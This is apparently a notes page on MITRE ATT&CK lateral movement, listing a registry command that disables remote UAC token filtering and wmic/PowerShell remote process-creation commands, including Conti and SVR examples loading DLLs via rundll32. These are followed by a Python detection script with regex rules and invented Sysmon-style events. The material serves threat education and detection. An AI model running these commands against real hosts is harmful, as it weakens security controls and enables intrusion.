Lateral Movement

The adversary is trying to move through your environment. https://attack.mitre.org/tactics/TA0008/

Disable Remote UAC Restrictions

Setting LocalAccountTokenFilterPolicy to 1 turns off the UAC token filtering that Windows applies to local administrator accounts connecting over the network, so those accounts receive a full administrative token for remote connections (SMB, WMI, and similar) instead of a filtered one.

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

WMIC

Source: https://www.picussecurity.com/resource/blog/t1047-windows-management-instrumentation-of-the-mitre-attack-framework

WMI allows users with the required privileges to execute commands on remote hosts without additional tools. Adversaries abuse this feature to move laterally in a compromised network. Adversaries have used the following commands to execute a command on a remote host.

wmic /node:<remote_ip> /user:<username> /password:<password> process call create cmd.exe /c "<command>"

Or, with PowerShell:

Invoke-WMIMethod -class Win32_Process -Name Create -ArgumentList "cmd /c <command>" -ComputerName <remote_hostname>

Conti TTP

wmic /node:victim_ip process call create "rundll32.exe C:/ProgramData/beacon_dll DllRegisterServer"

Russian Foreign Intelligence Service (SVR) TTP

wmic /node:<remote_host's_IP> /user:<username> /password:<password> process call create "rundll32 C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost"
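Defender-side detection of the activity listed above, as an added example that is not part of the original page: it runs a few simple rules over constructed, Sysmon Event ID 1-style process-creation records and flags the remote wmic / Invoke-WMIMethod process creation from the WMIC section, the LocalAccountTokenFilterPolicy change from the Remote UAC section, and, on the destination host, a child process of WmiPrvSE.exe (the WMI provider host that spawns processes created through Win32_Process.Create). The field names, host names, users and command lines in SAMPLE_EVENTS are invented for the example.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style, reduced to the
# fields used below). Hosts, users and command lines are invented for this example.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "cmdline": 'wmic /node:10.0.0.25 /user:admin /password:Passw0rd process call create "cmd.exe /c whoami"'},
    {"host": "WS01", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": 'powershell -c Invoke-WMIMethod -class Win32_Process -Name Create -ArgumentList "cmd /c whoami" -ComputerName FS01'},
    {"host": "WS01", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"},
    {"host": "WS01", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
     "cmdline": "wmic os get caption"},  # local WMI query, expected to be benign
    {"host": "FS01", "user": "NT AUTHORITY\\SYSTEM",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c whoami",
     "parent_image": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"},  # destination side of event 0/1
]

# Source-side: wmic.exe targeting another host (/node:) and creating a process.
REMOTE_WMIC_RE = re.compile(
    r"\bwmic(?:\.exe)?\b.*?/node:\S+.*?\bprocess\s+call\s+create\b", re.IGNORECASE)

# Source-side: PowerShell WMI/CIM cmdlet creating a Win32_Process on a named remote computer.
REMOTE_PS_WMI_RE = re.compile(
    r"\bInvoke-(?:WMI|Cim)Method\b.*?\bWin32_Process\b.*?\bCreate\b.*?-ComputerName\b", re.IGNORECASE)

# reg.exe setting LocalAccountTokenFilterPolicy to 1 (decimal or hex form).
UAC_FILTER_RE = re.compile(
    r"\breg(?:\.exe)?\s+add\b.*?LocalAccountTokenFilterPolicy\b.*?/d\s+(?:0x)?0*1\b", re.IGNORECASE)


def classify_event(event):
    """Return the list of rule names that match one process-creation event (empty if none)."""
    cmdline = event.get("cmdline", "")
    parent = event.get("parent_image", "")
    hits = []
    if REMOTE_WMIC_RE.search(cmdline):
        hits.append("T1047 remote process creation via wmic /node")
    if REMOTE_PS_WMI_RE.search(cmdline):
        hits.append("T1047 remote process creation via Invoke-WmiMethod")
    if UAC_FILTER_RE.search(cmdline):
        hits.append("LocalAccountTokenFilterPolicy set to 1 (remote UAC restrictions disabled)")
    # Destination-side: WmiPrvSE.exe is the parent of anything started through Win32_Process.Create.
    if parent.lower().endswith("\\wmiprvse.exe"):
        hits.append("process spawned by WmiPrvSE.exe (WMI-initiated execution on this host)")
    return hits


def scan(events):
    """Return (index, hits) for every event that matched at least one rule."""
    findings = []
    for i, event in enumerate(events):
        hits = classify_event(event)
        if hits:
            findings.append((i, hits))
    return findings


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[index]
        print(f"[{ev['host']}] {ev['user']}: {ev['cmdline']}")
        for hit in hits:
            print("    ->", hit)
```

The source-side and destination-side rules are meant to be correlated: a wmic /node or Invoke-WMIMethod -ComputerName event on one host, followed shortly by a WmiPrvSE.exe child process and a network (type 3) logon on the named target, is a much stronger signal than either alone. Legitimate administration tooling also creates processes over WMI, so in practice the rules are tuned against a baseline of known management hosts and accounts rather than alerted on raw.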
